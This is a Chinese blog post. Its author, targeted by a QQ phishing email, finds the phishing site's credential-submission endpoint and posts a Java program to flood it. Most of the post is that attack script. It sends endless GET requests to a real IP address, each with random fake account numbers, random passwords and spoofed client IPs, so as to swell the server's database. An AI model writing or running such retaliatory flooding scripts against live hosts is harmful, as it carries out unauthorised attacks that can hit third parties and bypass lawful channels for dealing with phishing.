无聊中的我,收到一个邮件 里面告诉我 我的qq账号存在风险
这个人居然想搞我qq
从域名就可以判断出 是钓鱼网站于是我想给他来点刺激的
第一步找到他的接口地址
用于用谷歌网络调试去抓包发现在点击登录后 他会把账号密码发送到他服务器中
第二部写一个程序 攻击他,让他的数据库数据暴增
package com.write.test;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.List;
import java.util.Map;
/**
* @作者: tjx
* @描述:
* @创建时间: 创建于16:00 2018/12/4
**/
class DoGet implements Runnable{
public static String sendGet(String url, String param) {
String result = "";
String urlName = url + "?" + param;
try {
URL realURL = new URL(urlName);
URLConnection conn = realURL.openConnection();
conn.setRequestProperty("accept", "*/*");
conn.setRequestProperty("connection", "Keep-Alive");
conn.setRequestProperty("user-agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36");
conn.connect();
Map<String, List<String>> map = conn.getHeaderFields();
for (String s : map.keySet()) {
System.out.println(s + "-->" + map.get(s));
}
BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream(), "utf-8"));
String line;
while ((line = in.readLine()) != null) {
result += "\n" + line;
}
} catch (IOException e) {
e.printStackTrace();
}
return result;
}
@Override
public void run() {
while (true){
//随机账号
String n = (int)((Math.random()*9+1)*1000000000)+"";
String p = (int)((Math.random()*9+1)*10000000)+"";
int ip = (int)((Math.random()*9+1)*100);
String url = "http://185.227.153.30:5000/accountadd?n="+n+"&p="+p+"&cip=116."+ip+".238.243&cname=%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%B7%B1%E5%9C%B3%E5%B8%82&u=4&t=3?qqdrsign";
System.out.println(url);
sendGet(url,null);
}
}
}
public class Fishing {
public static void main(String[] args) {
for (int i = 0;i<5;i++){
DoGet doGet = new DoGet();
doGet.run();
}
}
}